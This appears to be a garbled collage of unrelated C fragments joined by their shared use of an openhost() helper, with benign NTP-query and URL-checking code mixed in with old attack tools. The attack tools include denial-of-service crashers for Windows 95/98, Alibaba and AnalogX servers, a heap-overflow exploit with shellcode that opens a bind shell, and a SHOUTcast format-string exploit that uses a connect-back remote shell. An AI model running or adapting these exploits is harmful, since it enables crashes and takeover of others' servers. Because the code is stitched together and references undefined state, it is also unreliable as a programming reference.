main(int argc, char *argv[])
{
int sock,i;
if (argc<3) {
printf("\n\t\tCJB Ip Forwarding client by wC (version 1.0b)\n\n");
printf("Sintaxe: %s <username> <password> [url (offline)]\n",argv[0]);
printf("Send flamez to [email protected], Enjoy...\n\n");
}
else
if (argc==3) {
printf("CJB Ip Forwarding client by wC (version 1.0b)\n\n");
printf("Connecting to server... (%s)\n",server);
sock=openhost(server,port);
if (sock!=-1) {
sprintf(buf,"GET %s?username=%s&password=%s\n",cgiscript,argv[1],argv[2]);
sends(sock,buf);
close(sock);
printf("Done...%s.cjb.net is now forwarding to your ip!\n\n",argv[1]); }
else printf("\nCould not connect to server :/\n\n"); }
else {
printf("CJB Ip Forwarding Client by wC (version 1.0b)\n\n");
printf("Connecting to server... (%s)\n",server);
sock=openhost(server,port);
if (sock!=-1) {
sprintf(buf,"GET %s?username=%s&password=%s&url=%s\n",cgiscript,argv[1],argv[2],argv[3]);
sends(sock,buf);
close(sock);
printf("Account: %s.cjb.net\n",argv[1]);
printf("Forwarding to: %s\n",argv[3]);
printf("Done!\n\n"); }
else printf("\nCould not connect to server :/\n\n"); }
}
void
attack(char *host, int port)
{
int sock,i;
char *buf;
printf("\n\tDos Attack against any windows version (95/98 TESTED) by wildcoyote\n\n");
printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
sock=openhost(host,port);
if(sock<=0) {
printf("- Could not connect -\n");
printf("Exiting...\n\n");
exit(-1);
}
else printf("Connected to %s (%d)\n",host,port);
buf = (char *) malloc(260);
strcpy(buf,"GET /command.");
for(i=0;i<240;i++) strcat(buf,"A");
strcat(buf,"\n");
printf("Oh k! Sending a 240'char (extension) filename request to host...\n");
sends(sock,buf);
close(sock);
free(buf);
printf("Crash sent! The host *probably* crashed :P\n");
printf("Send flamez to [email protected], *Enjoy*...\n\n");
}
void
DoS(char *host, int port)
{
int sock,i;
char *buf;
printf("\nDoS against Alibaba 2.0 WebServer by wildcoyote\n\n");
printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
sock=openhost(host,port);
if(sock<=0) {
printf("- Could not connect -\n");
printf("Exiting...\n\n");
exit(-1);
}
else printf("Connected to %s (%d)\n",host,port);
printf("Allocating memory for DoS\n");
buf = (char *) malloc(8200); // it takes 8173 bytes, but i wave mem ;)
strcpy(buf,"GET ");
for(i=5;i<8198;i++) strcat(buf,"A");
strcat(buf,"\n\n");
printf("Oh k! Sending CRASH!\n");
sends(sock,buf);
close(sock);
free(buf);
printf("Crash sent! The host *probably* crashed :P\n");
printf("Send flamez to [email protected], *Enjoy*...\n\n");
}
int ntpq_openhost(char *hostname)
{
if ( openhost(hostname) )
{
numhosts = 1;
} else {
numhosts = 0;
}
return numhosts;
}
void
analogXcrash(char *host, int type)
{
char *buf;
int sock, i, x, buffer_size;
printf("Type Number: %d\n",type);
printf("Service : %s\n",analogXDoS_types[type].service);
printf("Port : %d\n",analogXDoS_types[type].port);
printf("Let the show begin ladyes...\n");
printf("Connecting to %s [%d]...",host,analogXDoS_types[type].port);
sock=openhost(host,analogXDoS_types[type].port);
if (sock==-1)
{
printf("FAILED!\n");
printf("Couldnt connect...leaving :|\n\n");
exit(-1);
}
printf("SUCCESS!\n");
printf("Allocating memory for buffer...");
buffer_size=(strlen(analogXDoS_types[type].command)
+
analogXDoS_types[type].overflow_string_size);
if (!(buf=malloc(buffer_size)))
{
printf("FAILED!\n");
printf("Leaving... :[\n\n");
exit(-1);
}
printf("WORKED! (heh)\n");
for(i=0;;i++)
if ((analogXDoS_types[type].command[i]=='B') &&
(analogXDoS_types[type].command[i+1]=='O')) break;
else buf[i]=analogXDoS_types[type].command[i];
for(x=0;x<analogXDoS_types[type].overflow_string_size;x++) strcat(buf,"X");
i+=2;
for(;i<strlen(analogXDoS_types[type].command);i++)
buf[strlen(buf)]=analogXDoS_types[type].command[i];
printf("Sending EVIL buffer ;)\n");
sends(sock,buf);
close(sock);
printf("Heh...that host should be a gonner by now ;)\n");
printf("Was it good for you to? :)\n\n");
}
/*
* host - set the host we are dealing with.
*/
static void
host(
struct parse *pcmd,
FILE *fp
)
{
int i;
if (pcmd->nargs == 0) {
if (havehost)
(void) fprintf(fp, "current host is %s\n", currenthost);
else
(void) fprintf(fp, "no current host\n");
return;
}
i = 0;
if (pcmd->nargs == 2) {
if (!strcmp("-4", pcmd->argval[i].string))
ai_fam_templ = AF_INET;
else if (!strcmp("-6", pcmd->argval[i].string))
ai_fam_templ = AF_INET6;
else {
if (havehost)
(void) fprintf(fp,
"current host remains %s\n", currenthost);
else
(void) fprintf(fp, "still no current host\n");
return;
}
i = 1;
}
if (openhost(pcmd->argval[i].string)) {
(void) fprintf(fp, "current host set to %s\n", currenthost);
} else {
if (havehost)
(void) fprintf(fp,
"current host remains %s\n", currenthost);
else
(void) fprintf(fp, "still no current host\n");
}
}
int main (int argc, char*argv[]) {
int port,sock;
char *target,*printer,*user,*userhost;
port = 0;
target = printer = user = userhost = NULL;
fprintf(stderr,"'lpd-mail.c' - Gus'98 with mods by Gamma\n");
if (argc < 5) usage(argv[0]);
printf("Start !!!!!!!!!!!!\n");
target = argv[1];
printer = argv[2];
user = argv[3];
userhost = argv[4];
if ((sock = openhost(target)) > 0) {
exit(doit(sock,printer,target,user,userhost));
} else {
exit(sock);
}
}
void
doit(char *host, int port, char *inputfile)
{
char buf[1024];
FILE *f;
int s, i;
s = openhost(host, port);
if (s < 0) {
printf("Couldn't connect.\n");
return;
}
f = fopen(inputfile, "r");
assert(f);
for (;;) {
fgets(buf, 1024, f);
if (feof(f))
break;
SSL_write(ssl, buf, strlen(buf));
}
SSL_write(ssl, buf, strlen(buf));
/* Eat the rest of the page */
while (i = SSL_read(ssl, buf, 1024)) {
buf[i] = NULL;
printf(buf);
fflush(stdout);
}
close(s);
SSL_free(ssl);
SSL_CTX_free(ctx);
return;
}
/*
* main - parse arguments and handle options
*/
int
ntpdcmain(
int argc,
char *argv[]
)
{
extern int ntp_optind;
delay_time.l_ui = 0;
delay_time.l_uf = DEFDELAY;
#ifdef SYS_VXWORKS
clear_globals();
taskPrioritySet(taskIdSelf(), 100 );
#endif
init_lib(); /* sets up ipv4_works, ipv6_works */
ssl_applink();
/* Check to see if we have IPv6. Otherwise default to IPv4 */
if (!ipv6_works)
ai_fam_default = AF_INET;
progname = argv[0];
{
int optct = ntpOptionProcess(&ntpdcOptions, argc, argv);
argc -= optct;
argv += optct;
}
if (HAVE_OPT(IPV4))
ai_fam_templ = AF_INET;
else if (HAVE_OPT(IPV6))
ai_fam_templ = AF_INET6;
else
ai_fam_templ = ai_fam_default;
if (HAVE_OPT(COMMAND)) {
int cmdct = STACKCT_OPT( COMMAND );
const char** cmds = STACKLST_OPT( COMMAND );
while (cmdct-- > 0) {
ADDCMD(*cmds++);
}
}
debug = DESC(DEBUG_LEVEL).optOccCt;
if (HAVE_OPT(INTERACTIVE)) {
interactive = 1;
}
if (HAVE_OPT(NUMERIC)) {
showhostnames = 0;
}
if (HAVE_OPT(LISTPEERS)) {
ADDCMD("listpeers");
}
if (HAVE_OPT(PEERS)) {
ADDCMD("peers");
}
if (HAVE_OPT(SHOWPEERS)) {
ADDCMD("dmpeers");
}
if (ntp_optind == argc) {
ADDHOST(DEFHOST);
} else {
for (; ntp_optind < argc; ntp_optind++)
ADDHOST(argv[ntp_optind]);
}
if (numcmds == 0 && interactive == 0
&& isatty(fileno(stdin)) && isatty(fileno(stderr))) {
interactive = 1;
}
#if 0
ai_fam_templ = ai_fam_default;
while ((c = ntp_getopt(argc, argv, "46c:dilnps")) != EOF)
switch (c) {
case '4':
ai_fam_templ = AF_INET;
break;
case '6':
ai_fam_templ = AF_INET6;
break;
case 'c':
ADDCMD(ntp_optarg);
break;
case 'd':
++debug;
break;
case 'i':
interactive = 1;
break;
case 'l':
ADDCMD("listpeers");
break;
case 'n':
showhostnames = 0;
break;
case 'p':
ADDCMD("peers");
break;
case 's':
ADDCMD("dmpeers");
break;
default:
errflg++;
break;
}
if (errflg) {
(void) fprintf(stderr,
"usage: %s [-46dilnps] [-c cmd] host ...\n",
progname);
exit(2);
}
if (ntp_optind == argc) {
ADDHOST(DEFHOST);
} else {
for (; ntp_optind < argc; ntp_optind++)
ADDHOST(argv[ntp_optind]);
}
if (numcmds == 0 && interactive == 0
&& isatty(fileno(stdin)) && isatty(fileno(stderr))) {
interactive = 1;
}
#endif
#ifndef SYS_WINNT /* Under NT cannot handle SIGINT, WIN32 spawns a handler */
if (interactive)
(void) signal_no_reset(SIGINT, abortcmd);
#endif /* SYS_WINNT */
/*
* Initialize the packet data buffer
*/
pktdatasize = INITDATASIZE;
pktdata = emalloc(INITDATASIZE);
if (numcmds == 0) {
(void) openhost(chosts[0]);
getcmds();
} else {
int ihost;
int icmd;
for (ihost = 0; ihost < numhosts; ihost++) {
if (openhost(chosts[ihost]))
for (icmd = 0; icmd < numcmds; icmd++) {
if (numhosts > 1)
printf ("--- %s ---\n",chosts[ihost]);
docmd(ccmds[icmd]);
}
}
}
#ifdef SYS_WINNT
WSACleanup();
#endif
return(0);
} /* main end */
int
exploit(char *host, int port, int type)
{
char sendbuf[500];
char buffer[377];
int i=0;
int sock2;
sock=openhost(host, port);
if (sock==-1) {
fprintf(stderr,"Unable to connect.\n\n");
exit(1);
}
fprintf(stdout, "Attacking (%s) ...\n", host);
memset(buffer, 0xbf, sizeof(buffer) - 1);
for(i=0;i<376;i=i+4)
{
buffer[i] = 0xbf; /* must be a valid pointer */
buffer[i+1] = 0xff;
buffer[i+2] = 0xb0;
buffer[i+3] = 0xef;
}
memcpy(buffer, shellcode, strlen(shellcode));
buffer[359] = 0xff; /* prev_size */
buffer[360] = 0xff;
buffer[361] = 0xff;
buffer[362] = 0xff;
buffer[363] = 0xfc; /* size field */
buffer[364] = 0xff;
buffer[365] = 0xff;
buffer[366] = 0xff;
buffer[368] = (targets[type - 1].retloc & 0x000000ff); /* FD */
buffer[369] = (targets[type - 1].retloc & 0x0000ff00) >> 8;
buffer[370] = (targets[type - 1].retloc & 0x00ff0000) >> 16;
buffer[371] = (targets[type - 1].retloc & 0xff000000) >> 24;
buffer[372] = (targets[type - 1].ret & 0x000000ff); /* BK */
buffer[373] = (targets[type - 1].ret & 0x0000ff00) >> 8;
buffer[374] = (targets[type - 1].ret & 0x00ff0000) >> 16;
buffer[375] = (targets[type - 1].ret & 0xff000000) >> 24;
buffer[376] = 0x0;
snprintf(sendbuf, sizeof(sendbuf) -1, "POST / HTTP/1.0\n"
"Content-Length: -800\n"
"\n\n%s\n",buffer);
write(sock, sendbuf, strlen(sendbuf));
sleep(4);
close(sock);
sock=openhost(host, 30464);
if (sock==-1) {
fprintf(stderr,"Failed.\n\n");
exit(1);
}
fprintf(stdout, "Exploit successful!\n");
fprintf(stdout, "------------------------------------------------------------------\n");
shell(sock);
close(sock);
return 0;
}
/*
* Accept a url string, return a struct status.
*
* A negative status indicates a problem either connecting to the
* machine, or a url parse problem. The message will tell you what,
* specifically happened (although it doesn't distinguish between a
* timeout, and a connection refused).
*/
struct status
getstatus(char *url)
{
int i;
char line[1024];
char *p, *q;
struct url u;
struct status st;
struct host_ret conn;
st.status = -1;
st.message = NULL;
st.bytesread = 0;
u = parseurl(url);
if (u.port == -1) {
st.message = strdup("Invalid url request format");
return (st);
}
conn = openhost(u.host, u.port, u.ssl);
if (conn.s < 0) {
st.message = strdup("Could not connect to host");
return (st);
}
send_data(conn, u, "GET ");
send_data(conn, u, u.req);
send_data(conn, u, " HTTP/1.0\n\n");
alarm(120);
i = recv_data(conn, u, line, 1024);
alarm(0);
if (i < 1) {
st.message = strdup("Timeout, or nothing returned.");
return (st);
}
line[i] = NULL;
/*
* My keen parsing techniques, flip through it with a pointer
* to get the status number
*/
p = &line[0];
while (*p++ && *p != ' ');
st.status = atoi(p);
/* Now we want the status message */
while (*++p && *p != ' ');
/* Kill Whitey */
q = p;
while (*++q && !iswhitey(*q));
*q = NULL;
st.message = strdup(p + 1);
/* Eat the rest of the page */
while (recv_data(conn, u, line, 1024));
#ifdef USE_SSLEAY
if (u.ssl) {
if (conn.ssl)
SSL_free(conn.ssl);
if (conn.ctx)
SSL_CTX_free(conn.ctx);
}
#endif
close(conn.s);
freeurl(u);
return (st);
}
int
main (int argc,char *argv[])
{
char buf1[512];
char buf2[512];
char host[256];
char pass[256]="changeme";
char data;
int type= 0;
int c=0;
int port=8001;
char devices[256] = "ppp0";
unsigned char *ptr;
struct hostent *hp;
struct sockaddr_in sin_listener;
struct ifreq ifr;
struct timeval timeout;
fd_set fdread;
int delay = 12;
int i = 0;
int mode = 0;
int local_port = 0;
int opt = 0;
int ret = 0;
int sin_len = sizeof (struct sockaddr_in);
int sock = 0;
int sock2 = 0;
int sockd = 0;
int listener = 0;
int time_out = 4;
int tmp = 0;
srand(getpid());
fprintf(stdout,"SHOUTcast v1.9.4 remote exploit by exworm of 0seen\n");
fprintf(stdout,"--------------------------------------------------(www.oseen.org)\n");
while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF)
{
switch(c)
{
case 'p':
port=atoi(optarg);
if ((port <= 0) || (port > 65535)) {
fprintf(stderr,"Invalid port.\n\n");
exit(1);
}
break;
case 'a':
memset(devices,0x0,sizeof(devices));
strncpy(devices,optarg,sizeof(devices) - 1);
break;
case 't':
type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 28) {
for(i = 0; i < sizeof(targets) / 28; i++)
fprintf(stderr, "%02d. %s - %s [0x%08x - 0x%08x]\n",
i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].eax);
return -1;
}
break;
case 'h':
memset(host,0x0,sizeof(host));
strncpy(host,optarg,sizeof(host) - 1);
break;
default:
usage(argv[0]);
exit(1);
break;
}
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
if (strlen(host) == 0) {
usage(argv[0]);
exit(1);
}
sock=openhost(host, port);
if (sock==-1) {
fprintf(stderr,"- Unable to connect.\n\n");
exit(1);
}
strncpy(ifr.ifr_name, devices, 15);
if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {
fprintf(stderr, "socket() error.\n");
return -1;
}
if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
fprintf(stderr, "socket() error.\n");
return -1;
}
ptr = get_my_ip_addr(sockd, &ifr);
memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);
sin_listener.sin_family = AF_INET;
memset(&sin_listener.sin_zero, 0x00, 8);
while(1) {
local_port = local_port = 45295;
sin_listener.sin_port = htons(local_port);
if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break;
}
listen(listener, 1);
fprintf(stdout, "[+] lisntener...\n");
linux_connect_back[129] = (unsigned int) *(ptr + 0);
linux_connect_back[130] = (unsigned int) *(ptr + 1);
linux_connect_back[131] = (unsigned int) *(ptr + 2);
linux_connect_back[132] = (unsigned int) *(ptr + 3);
char req[1024] = "GET /content/DD"
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
strcat(req, "DD.mp3 HTTP/1.0\r\n\r\n");
char req1[1024] = "GET /content/AA"
/* sprintf GOT addr */
"\x3c\x49\x06\x08\x3d\x49\x06\x08\x3e\x49\x06\x08\x3f\x49\x06\x08";
strcat(req1, linux_connect_back);
strcat(req1, ".mp3 HTTP/1.0\r\n\r\n");
char *req2 = "GET /content/%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAA-%n-"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n.mp3"
" /HTTP/1.0\r\n\r\n";
printf("[*] Sending first request ...\n");
write(sock, req1, strlen(req1));
close(sock);
sock=openhost(host, 8000);
if (sock==-1) {
fprintf(stderr,"- Unable to connect.\n\n");
exit(1);
}
printf("[*] Sending second request ...\n");
while(1) {
write(sock, req2, strlen(req2));
sleep(2);
FD_ZERO(&fdread);
FD_SET(listener, &fdread);
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
while(1) {
ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);
if (ret < 0) {
close(sock);
close(listener);
fprintf(stderr, "select() error.\n");
return -1;
}
if (ret == 0) {
fprintf(stderr, "[+] Failed, waiting %d seconds.\n"
"[+] Use ctrl-c to abort.\n", delay);
sleep(delay);
break;
}
if(FD_ISSET(listener, &fdread)) {
sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len);
close(sock);
close(listener);
fprintf(stderr, "[+] ownedbyOseen!\n"
"-----------------------------------------------------------\n");
shell(sock2);
close(sock2);
return 0;
}
}
}
fprintf(stderr, "[+] Exploit failed.\n");
close(listener);
close(sock);
return 0;
}
